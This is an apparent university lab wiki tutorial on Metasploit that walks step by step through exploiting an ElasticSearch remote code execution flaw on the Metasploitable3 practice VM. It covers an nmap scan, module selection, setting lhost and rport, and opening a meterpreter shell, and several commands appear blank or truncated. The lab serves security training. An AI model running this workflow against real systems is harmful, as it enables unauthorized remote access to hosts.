Metasploit Framework MSF

From Embedded Lab Vienna for IoT & Security
Jump to: navigation, search


Metasploit Framework MSF is a tool to detect security vulnerabilities in a IT network infrastructure, it is called Penetration Testing. Penetration Testing is often referred to as "Ethical Hacking". The aim of the penetration tester is to analyse a specific target or a whole network domain.This tool is providing a Application Programming Interface API for security developers to modify or create new vulnerability modules within the framework.

A penetration test is occuring in several stages to get the best pentest results. Firstly, it is necessary to specify the requirements together with your customer. That means, to define the devies at the target domain you would like to attack. After this stage, it is necessary to perform Information or Intelligence Gathering to get enough important details from the target to detect an unprotected breach. When one or more breaches are detected, the penetration tester is spying out how to gain access to the systems. Finally, the exploit of the systems can be performed, if the method of gaining access to it is determined. If the access is gained, Post-Exploitation is necessary to gather important data in the critical network domain.


  • Operating system: Linux, f.e. Kali Linux or Ubuntu 18.04
  • Packages: msfconsole postgresql git nmap virtualbox

In order to complete these steps, you must have followed Metasploit Framework, Metasploitable3, PostgreSQL or MySQL Installation Documentation before.

Description of exploit

This is a short Step by Step guidance to run an exploit against a Windows Server 2008 in a virtual machine. Therefore we chose the Application ElasticSearch prior to Version 1.2.0, which is already installed in the Metasploitable3 virtual machine from Rapid7.

The module multi/elasticsearch/script_mvel_rce exploits a Remote Command Execution (RCE) vulnerability in ElasticSearch. The REST API allows dynamic scripts execution without authentication. The remote attacker is able to execute arbitrary Java Code on the target system.

Step 1: open msf tool

Enter the command in the shell to open the terminal of the framework:



Step 2: nmap scan

Enter the command in the shell to detect the open ports of your virtual machine:

db_nmap -Pn


This command will save the scan directly to the database, you have configured. Enter the command in the shell to check the save results:



Step 3: search module

Enter the command in the shell to search for a exploit module, named elastic:

search elastic


Step 4: use module

Enter the command in the shell to use a exploit module:

use exploit/multi/elasticsearch/script_mvel_rce


Enter the command in the shell to check the usage of the module:



Step 5: show module options

Enter the command in the shell to show the module options:

show options


Step 6: set module options

Enter the command in the shell to set the options:

set rhosts
set verbose true
set lhost
set rport 9200


Check your settings again with command:

show options


Step 7: vulnerability and exploit

Enter the command in the shell to check the vulnerability of the system:



Enter the command in the shell to exploit:



The connection to the meterpreter should be opened to perform post-exploitation. If this is not working, maybe check your firewall configurations.

Step 8: meterpreter shell

Enter the command in the shell to open the Command Line Interface CLI of the target host:



Enter the command in the shell to check the placement of the xxx.jar file:

DIR /s C:\WINDOWS\TEMP\xxx.jar


Used Hardware